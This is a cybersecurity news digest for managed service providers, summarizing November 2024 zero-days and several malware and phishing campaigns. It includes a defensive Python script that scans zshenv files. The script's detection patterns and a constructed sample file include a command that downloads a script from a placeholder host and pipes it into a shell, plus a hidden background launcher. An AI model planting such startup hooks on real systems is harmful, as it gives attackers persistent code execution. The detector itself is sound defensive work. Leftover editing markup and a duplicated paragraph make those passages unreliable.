MSP cybersecurity news digest, November 19, 2024

Microsoft Patch Tuesday for November 2024 fixes 89 flaws, including four zero-days

Microsoft’s November 2024 Patch Tuesday addressed 89 vulnerabilities, including four zero-day flaws, two of which were actively exploited. The update resolved four critical issues: two remote code execution and two privilege elevation flaws.

Notable zero-days included CVE-2024-43451, which exposes NTLM hashes, and CVE-2024-49039, a Windows Task Scheduler flaw that allows privilege elevation. Three other vulnerabilities, including a Microsoft Exchange Server spoofing flaw (CVE-2024-49040) and an Active Directory Certificate Services issue (CVE-2024-49019), were disclosed but not actively exploited.

The updates also incorporated fixes for previously patched Microsoft Edge vulnerabilities.

Cryptocurrency thieves attack macOS: “Hidden Risk” malware disguises itself as PDFs

Researchers have identified North Korean attackers targeting the cryptocurrency industry with advanced multistage malware.

The latest phishing campaign, active since October 2024, builds on prior attacks and bypasses macOS defenses by using signed and notarized code. Dubbed “Hidden Risk,” the campaign uses phishing emails with deceptive cryptocurrency-themed PDF lures to trick victims into downloading malicious apps. The malware keeps persistent control of macOS systems by abusing the Zshenv configuration file, a hidden script that the Zsh shell runs every time it starts, so malicious code executes automatically and evades detection.
</grreplace>
<gr_replace lines="17" cat="clarify" orig="The group behind">
The group behind these attacks, BlueNoroff, linked to the infamous Lazarus group, uses a vast network of infrastructure mimicking legitimate cryptocurrency companies for malware delivery and command and control.

The group behind these attacks, BlueNoroff, linked to the infamous Lazarus, uses a vast network mimicking legitimate cryptocurrency companies for malware delivery and control.
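Because the zshenv persistence described above lives in a plain-text file that Zsh reads at every startup, a defender can audit that file directly. The following script is an added example for this digest, not code from the researchers who reported the campaign: it reads the system-wide and per-user zshenv files and flags lines that a startup file rarely needs but a persistence hook typically does (piping a download into a shell, decoding embedded base64, backgrounding a process, referencing temp paths). The heuristic patterns and the two sample file bodies are constructed for illustration and are not the campaign's indicators.

```python
import re
from pathlib import Path

# Heuristic patterns for this example (assumptions, not the researchers' published
# indicators). Each pattern is paired with the reason it is reported.
ZSHENV_HEURISTICS = [
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b"), "pipes a downloaded script into a shell"),
    (re.compile(r"\bbase64\b.*(-d\b|-D\b|--decode\b)"), "decodes an embedded base64 payload"),
    (re.compile(r"(^|[;&|]\s*)eval\b"), "evaluates a dynamically built command"),
    (re.compile(r"\bnohup\b|&\s*$"), "backgrounds a process at shell startup"),
    (re.compile(r"(^|[\s\"'=])/(private/)?(var/)?tmp/"), "references a temp directory path"),
]


def audit_zshenv_text(text, source="<inline>"):
    """Scan one zshenv body and return a finding per non-comment line that matches.

    Each finding records the source, 1-based line number, the stripped line text,
    and every heuristic reason that matched, so an analyst sees all signals at once.
    """
    findings = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        reasons = [why for pattern, why in ZSHENV_HEURISTICS if pattern.search(line)]
        if reasons:
            findings.append({"source": source, "line": lineno, "text": line, "reasons": reasons})
    return findings


def audit_zshenv_paths(paths=None):
    """Audit the zshenv files Zsh reads at startup: /etc/zshenv, then ~/.zshenv.

    Missing or unreadable files are skipped rather than treated as findings.
    """
    if paths is None:
        paths = [Path("/etc/zshenv"), Path.home() / ".zshenv"]
    findings = []
    for path in paths:
        path = Path(path)
        if not path.is_file():
            continue
        try:
            text = path.read_text(errors="replace")
        except OSError:
            continue
        findings.extend(audit_zshenv_text(text, source=str(path)))
    return findings


# Constructed benign ~/.zshenv: environment setup only, which should produce no findings.
BENIGN_ZSHENV = """\
# constructed benign ~/.zshenv
export EDITOR=vim
export PATH="$HOME/.local/bin:$PATH"
export LANG=en_US.UTF-8
"""

# Constructed illustration of a startup hook (placeholder host, no real payload).
SUSPICIOUS_ZSHENV = """\
# constructed illustration of a startup hook (placeholder host, no real payload)
export EDITOR=vim
curl -s http://example.invalid/update.sh | sh >/dev/null 2>&1
nohup /private/tmp/.updater >/dev/null 2>&1 &
"""


if __name__ == "__main__":
    # Run against the constructed samples first, then against the live files on this host.
    for label, body in (("benign sample", BENIGN_ZSHENV), ("suspicious sample", SUSPICIOUS_ZSHENV)):
        for f in audit_zshenv_text(body, source=label):
            print(f"{f['source']}:{f['line']}: {f['text']}")
            for why in f["reasons"]:
                print(f"    - {why}")
    for f in audit_zshenv_paths():
        print(f"{f['source']}:{f['line']}: {f['text']} ({'; '.join(f['reasons'])})")
```

The heuristics are deliberately narrow so that a typical `.zshenv` (exports, PATH edits) stays clean; an MSP rolling this out across a fleet would treat any finding as a prompt to inspect the file and the process it launches, and would pair it with file-integrity monitoring on both zshenv locations so that a newly written hook is noticed at write time rather than at the next audit.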

Fileless version of Remcos RAT malware spread through exploited Excel attachments

Researchers have uncovered a new phishing campaign spreading a fileless variant of the Remcos RAT malware.

This malware is known for its robust feature set, which lets attackers control victims’ computers and collect sensitive data. The campaign begins with purchase-order-themed phishing emails carrying malicious Excel attachments that exploit a known remote code execution vulnerability (CVE-2017-0199). The attachment downloads an HTML application (HTA) file that runs a complex mix of JavaScript, VBScript and PowerShell, ultimately deploying Remcos RAT directly in memory using process hollowing. Remcos enables attackers to harvest data, control processes and execute remote commands.

Separately, researchers highlighted that attackers have exploited DocuSign APIs to send realistic-looking, fake invoices, bypassing security defenses with legitimate accounts.

Aerospace industry attacked by Iranian hackers using “Dream Job” lures to deploy SnailResin malware

The Iranian threat actor TA455 has adopted tactics similar to North Korea’s “Dream Job” campaign, using fake job offers to target the aerospace industry since September 2023.

This group, linked to APT35 and Iran’s Islamic Revolutionary Guard Corps (IRGC), distributes malware such as SnailResin to deploy the SlugResin backdoor. Its methods include job-themed lures, DLL side-loading, and fake recruiting websites and LinkedIn profiles. Researchers highlighted a trojanized loader (secur32.dll) that grants remote access to compromised systems, allowing attackers to steal data and move laterally.

TA455’s campaigns use GitHub to obscure command-and-control activity by blending it with legitimate traffic. The operation relies on multistage infections and spear-phishing emails with job-related documents to bypass detection and deceive targets.

Researchers: Two-step phishing attacks using Microsoft Visio files are a major threat

Researchers have noted that two-step phishing attacks have become a significant threat, using trusted platforms like DocuSign and SharePoint to deliver malicious content in layers.

Recently, Microsoft Visio files have been weaponized in these campaigns as a new tactic to evade detection. Visio files, typically used for creating professional diagrams, are being exploited to hide malicious URLs and trick users into clicking links. Attackers send emails, often from breached accounts to enhance legitimacy, that point to Visio files hosted on SharePoint. The files contain deceptive elements, such as “View Document” buttons that, when clicked with the “Ctrl” key held, lead victims to phishing sites.

This approach targets organizations worldwide and seeks to steal user credentials through a fake Microsoft login page.